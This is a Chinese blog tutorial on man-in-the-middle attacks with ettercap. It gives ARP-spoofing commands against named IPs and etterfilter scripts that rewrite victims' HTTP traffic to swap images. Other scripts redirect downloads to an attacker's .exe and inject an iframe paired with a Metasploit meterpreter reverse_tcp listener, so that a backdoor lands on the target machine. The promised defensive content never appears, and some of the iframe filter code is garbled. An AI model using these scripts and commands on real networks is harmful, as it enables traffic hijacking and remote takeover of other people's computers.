当前位置: 开发笔记 > 编程语言 > 正文

MITM（中间人攻击）原理及防范初探（二）

作者：伊丽汇 | 来源：互联网 | 2024-11-22 12:46

上一篇文章MITM（中间人攻击）原理及防范初探（一）给大家介绍了利用ettercap进行arp欺骗及劫持明文口令，后来我发现好友rootoorotor的文章介绍比我写的更透彻，所以基础利用大家可以参看

上一篇文章
MITM（中间人攻击）原理及防范初探（一）给大家介绍了利用ettercap进行arp欺骗及劫持明文口令，后来我发现好友
rootoorotor的文章介绍比我写的更透彻，所以基础利用大家可以参看他的博文～很棒哦～

这次我会给大家着重介绍在进行MITM时使用到的一个强大的嗅探工具——ettercap

0x00ettercap介绍

0x01ettercap欺骗规则建立

0×02攻击举例

0×03利用ettercap挂马

————————————————分割线————————————————————————–

0x00ettercap介绍

ettercap是linux下（win下也有）一个异常强大的欺骗工具，可以为你快速建立和发送伪造数据包，级别从网络适配器到各种app不等，也能从本地端口鉴定绑定的数据包，反正要多牛逼就有多牛逼

大家可以从http://ettercap.sourceforge.net/download.php下载

在下载安装包后，到下载的目录分别执行

#./configure&&make&&make install
#./configure&&make&&make plug-ins
#./configure&&make&&make plug-ins_install

win下无脑安装就不做详解了

0x01ettercap欺骗规则建立

工欲善其事必先利其器，我们先为自己的ettercap建立欺骗规则

默认规则如下：

当然，你也可以建立自己的规则，比如：

# replace rmccurdy with your website # replace the url with what ever exe you like

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“keep-alive”, “close” “);
replace(“Keep-Alive”, “close” “);

}

if (ip.proto == TCP && search(DATA.data, “: application”) ){
# enable for logging log(DECODED.data, “/tmp/log.log”);
msg(“found EXEn”);
# “Win32″ is the first part of the exe example:
# if the EXE started with “this program must be run in MSDOS mode” you could search for MSDOS etc ..
if (search(DATA.data, “Win32″)) {
msg(“doing nothingn”);
} else {
replace(“200 OK”, “301 Moved Permanently
Location: http://你自己的地址.exe
“);
msg(“redirect successn”);

}
}
这个规则大概是说，把80端口所请求的数据包换成了自己的exe，这是个win32的可执行文件，然后你可以通过MSF生产一个TCP后门啥的，就把这个地址换到location这里，然后用命令

etterfilter alert.filter -o alert.e

进行编译，这里的详细操作可以参考rootoorotor同学的第二篇笔记的一段，他描述的比我详细，也举例写了一个规则

在编译完成后执行

ettercap -T -q -i vboxnet0 -F exe.ef -M ARP

即可进行欺骗

0×02攻击举例

如果你感兴趣，可以参考这里的脚本进行编译

这个脚本实现的功能是改变80端口所请求的图片，并用本地图片替换之

脚本如下：

if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=https://img.php1.cn/3cd4a/1eebe/cd5/45a090220e38e09d.webp\" "); replace("IMG SRC=", "img src=https://img.php1.cn/3cd4a/1eebe/cd5/45a090220e38e09d.webp\" "); msg("Filter Ran.\n"); }

编译一下试试～

然后键入命令

ettercap -T -q -i wlan0 -F change.ef -M ARP:remote /172.16.1.31/ /172.16.1.1/

（11是我的本机，31是攻击目标）

之后被攻击者通过80端口请求的任一图片都会被替换（我换成了我的，嘿嘿）

0×03利用ettercap挂马

当然，想要利用ettercap挂马也是可以的，真是狂拽炫酷叼（额，因为网内都是宿舍的同学，我就不挂马了，但是介绍一下方法给大家）

if (ip.proto == TCP && ip.dst != '192.1.1.200' && tcp.dst == 80 || tcp.dst == 8080) {

#…and if it contains an Accept-Encoding header…

if (search(DATA.data, “Accept-Encoding”)) {

#…remove any Encoding (make sure we are using plain text)

replace(“Accept-Encoding”, “Accept-Nothing!”);

}

#–Inject Iframe–

if (ip.proto == TCP && ip.dst != ’192.1.1.200′ && tcp.src == 80 || tcp.src == 8080) {

if (search(DATA.data, “”)){

#Replace it with the body tag and an iframe to our attacking webpage

replace(“”,”

msg(“iframe injected after\n”);

}

if (search(DATA.data, “”)){

replace(“”,”

msg(“iframe injected after\n”);

}

}
利用MSF修改马儿的地址，然后用同样的方法编译脚本

找一个不用的端口号监听，例如

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.1.31 LPORT=1024 E

如此即监听1024草榴端口（咦，有奇怪的东西混进去了）

然后用ettercap调用脚本

ettercap -Tq -i wlan0 -F /usr/share/ettercap/刚刚编译的文件地址-M arp:remote /172.16.1.31 /172.16.1.11/

执行后目标主机会下载你的后门，和之前我说道的TCP后门产生的效果一样，然后目标运行了网马后你就成功入侵了目标主机

推荐阅读

int
网络链路质量监控：Smokeping部署与配置

本文详细介绍了如何在Linux系统上安装和配置Smokeping，以实现对网络链路质量的实时监控。通过详细的步骤和必要的依赖包安装，确保用户能够顺利完成部署并优化其网络性能监控。 ... [详细]

蜡笔小新 2024-12-27 19:31:05
default
CentOS7源码编译安装MySQL5.6

2019独角兽企业重金招聘Python工程师标准一、先在cmake官网下个最新的cmake源码包cmake官网：https:www.cmake.org如此时最新 ... [详细]

蜡笔小新 2024-12-27 17:49:56
php
Yii2 GridView 实现列表页数据直接编辑的完整指南

本文详细介绍了如何使用 Yii2 的 GridView 组件在列表页面实现数据的直接编辑功能。通过具体的代码示例和步骤，帮助开发者快速掌握这一实用技巧。 ... [详细]

蜡笔小新 2024-12-27 16:27:52
php
解决PHP与MySQL连接时出现500错误的方法

本文详细探讨了当使用PHP连接MySQL数据库时遇到500内部服务器错误的多种解决方案，提供了详尽的操作步骤和专业建议。无论是初学者还是有经验的开发者，都能从中受益。 ... [详细]

蜡笔小新 2024-12-27 15:48:52
get
中央电视台电影频道节目预告及优化分析

本文详细介绍了中央电视台电影频道的节目预告，并通过专业工具分析了其加载方式，确保用户能够获取最准确的电视节目信息。 ... [详细]

蜡笔小新 2024-12-25 21:01:14
int
深入解析JDBC源码

本文详细探讨了JDBC（Java数据库连接）的内部机制，重点分析其作为服务提供者接口（SPI）框架的应用。通过类图和代码示例，展示了JDBC如何注册驱动程序、建立数据库连接以及执行SQL查询的过程。 ... [详细]

蜡笔小新 2024-12-25 19:59:15
int
编写有趣的VBScript恶作剧脚本

本文将介绍如何编写一些有趣的VBScript脚本，这些脚本可以在朋友之间进行无害的恶作剧。通过简单的代码示例，帮助您了解VBScript的基本语法和功能。 ... [详细]

蜡笔小新 2024-12-28 09:46:23
int
Dockerfile 编写与 Docker 网络配置详解

本文详细介绍了 Dockerfile 的编写方法及其在网络配置中的应用，涵盖基础指令、镜像构建与发布流程，并深入探讨了 Docker 的默认网络、容器互联及自定义网络的实现。 ... [详细]

蜡笔小新 2024-12-27 17:31:41
int
Linux 自动化安装脚本详解

本文介绍了一款用于自动化部署 Linux 服务的 Bash 脚本。该脚本不仅涵盖了基本的文件复制和目录创建，还处理了系统服务的配置和启动，确保在多种 Linux 发行版上都能顺利运行。 ... [详细]

蜡笔小新 2024-12-27 16:33:32
get
在Ubuntu 16.04 LTS上配置Qt Creator开发环境

本文详细介绍了如何在Ubuntu 16.04 LTS系统中安装和配置Qt Creator，涵盖了从下载到安装的全过程，并提供了常见问题的解决方案。 ... [详细]

蜡笔小新 2024-12-27 13:19:53
int
Linux 网卡绑定的七种工作模式详解

本文深入探讨了Linux系统中网卡绑定（bonding）的七种工作模式。网卡绑定技术通过将多个物理网卡组合成一个逻辑网卡，实现网络冗余、带宽聚合和负载均衡，在生产环境中广泛应用。文章详细介绍了每种模式的特点、适用场景及配置方法。 ... [详细]

蜡笔小新 2024-12-27 10:18:13
default
Samba服务器配置与CIFS文件共享

本文详细介绍如何使用Samba软件配置CIFS文件共享服务，涵盖安装、配置、权限管理及多用户挂载等关键步骤。通过具体示例和命令行操作，帮助读者快速搭建并优化Samba服务器。 ... [详细]

蜡笔小新 2024-12-26 17:44:08
settings
MySQL 数据库迁移指南：从本地到远程及磁盘间迁移

本文详细介绍了如何在不同场景下进行 MySQL 数据库的迁移，包括从一个硬盘迁移到另一个硬盘、从一台计算机迁移到另一台计算机，以及解决迁移过程中可能遇到的问题。 ... [详细]

蜡笔小新 2024-12-26 13:21:38
int
深入解析 org.apache.xmlbeans.SchemaType.getBaseEnumType() 方法及其应用

本文详细介绍了 Java 中 org.apache.xmlbeans.SchemaType 类的 getBaseEnumType() 方法，提供了多个代码示例，并解释了其在不同场景下的使用方法。 ... [详细]

蜡笔小新 2024-12-26 11:46:55
int
Python 爬虫基础教程及代码实例

根据最新发布的《互联网人才趋势报告》，尽管大量IT从业者已转向Python开发，但随着人工智能和大数据领域的迅猛发展，仍存在巨大的人才缺口。本文将详细介绍如何使用Python编写一个简单的爬虫程序，并提供完整的代码示例。 ... [详细]

蜡笔小新 2024-12-26 10:42:40

伊丽汇

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章